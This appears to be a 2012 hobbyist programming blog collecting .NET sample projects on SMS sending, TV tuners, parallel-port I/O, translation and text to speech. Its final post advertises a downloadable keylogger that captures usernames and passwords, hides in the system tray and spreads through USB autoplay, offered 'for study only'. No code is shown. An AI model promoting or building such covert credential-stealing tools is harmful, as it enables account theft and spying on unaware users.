Wednesday 6 June 2012

.NET Code (Sending and Receiving SMS using AT Commands via GSM Phone )

You can request for the Demo version or obtain the full source code of .NET SMS Server (pure AT commands, no OCX or dll) , just contact me @ the addresses below.







comments

.NET TV Tuner (Digital/Cable/Analog )



By 2015 all analog/Cable TV will be replalced by Digital TVs using Digital Signal like in Japan and other advance countries
The NTC decided that the Philippines will use and adopt the ISDB-T, finally.
So geek-gadgets people can watch live HD Channels for  free and Paid (PPV) from their PSP, Mobile Phones ,Tablets and ofcource PC and Laptops.
Sources:
I decided to do a research in order to interface and  create a Windows based Digital TV Tuner using .NET and COM32 components. 

Hardware Requirements:
1)Digital TV Tuner Installed (in my case I used Pixel View and Encore TV Tuners)
Programming Requirements:
1)MSVidCtl (COM32 Components)
sample Codes still in BETA.

Thanks and Enjoy!!! HAppy Coding!!!
Download Code: 
Sample Project
Facebook Fan Page




comments

INPOUT32.dll under .NET (Sending Data via parallel port )



Sample how to send data to LPT or printer port using INPOUT32.dll from Lakeview Research..
This time .NET version , very handy and quite stable under Windows XP.
Good for Software-Hardware Engineers and design projects.
  1. Option Strict Off
  2. Option Explicit On
  3. Module InpOut32_Declarations
  4. 'Inp and Out declarations for port I/O using inpout32.dll.
  5. Public Declare Function Inp Lib "inpout32.dll" Alias "Inp32" (ByVal PortAddress As Short) As Short
  6. Public Declare Sub Out Lib "inpout32.dll" Alias "Out32" (ByVal PortAddress As Short, ByVal Value As Short)
  7. End Module
DLL downlload links

Paste the INPOUT32.dll to C:\Windows\System\
Thanks and Enjoy!!! HAppy Coding!!!
Download Code: 
Sample Project
Facebook Fan Page


comments

.NET Language Translator using Google Translate API


This is a sample app written in .NET on how to use the Google Translate API.

Can be ported to your existing App or even use as a Client Google Translator (Windows version)

Feature:
  • Support all functions of Google Ajax Language API.
  • CLS compatible. It can be used by any .NET languages (VB.NET, C++/CLI etc.)

Google Translate API for .NET 

Description:
Provides a simple, unofficial, .NET Framework API for using Google Ajax Language API service.

    TODO:
    Download API from Google then ,make a reference to your project (Silverlight, C#, .NET, WPF, etc)
    Then make an instance in order to call the API.

    Thanks and Enjoy!!! HAppy Coding!!!
    Download Code: 
    Sample Project
    Facebook Fan Page




    comments

    Sending SMS using SMS Gateway !!

    As requested here's my sample of Sending SMS using SMS gateway (HTTP). No need for SIM, Modems or even load.. All we need is an account from Clickatell  and Buy Credits using Paypal or CC from the Best SMS Gateway (Clickatell).
    This SMS Gateway is using by Big Companies like Easy Forex, T-MAC, Global Forex Trading, Money Bookers, etc,, Even me , Im using this Superb SMS services ,(",) (too bad its too expensive,,lol)
    The Clickatell's HTTP API supports PHP, .NET, JAVA, Python, Ruby, Cold Fusion etc
    so all programmers will benefits to this, not only Windows based programmers but also Non-windows platform based..

    Download Code: 
    Sample Project
    Facebook Fan Page



    comments

    Text to Speech (one line of Code)


    This is a demonstration of Text to speech using microsoft Speech Oblect Library
    with one line one code...
    I used this TTS features in my Home Automation with voice control, CAI progrms(computer Aided instructions), Expert Systems and Voice Tutorials Systems..
    I'll post next time my voice recognition app.
    Hope you like it!!!
    Questions,? Tutorials,Project Request, Custom Sofware/Design Projects contact me..
    Download Code: 
    Sample Project
    Facebook Fan Page
    comments

    KeyLogger (hacking tool) .NET



    Simple Key Logger that can capture username and password inputted by the user of the hosted machine.
    Demo Features:
    Log all the key activity of the user,
    Capture username, email and password
    Can be minimized to system tray for security
    Password Protected.
    Full Project
    Web browser mod e(capture only username and password if the using is typing on the web browser)
    Can be export to .txt or .xls files
    parse all unwanted char,etc
    USB mode, autoplay (no need to execute the program itself)
    etc..
    Note:
    THis is only for study only, dont use this to hack accounts.

    Download Sample Project

    Facebook Fan Page




    comments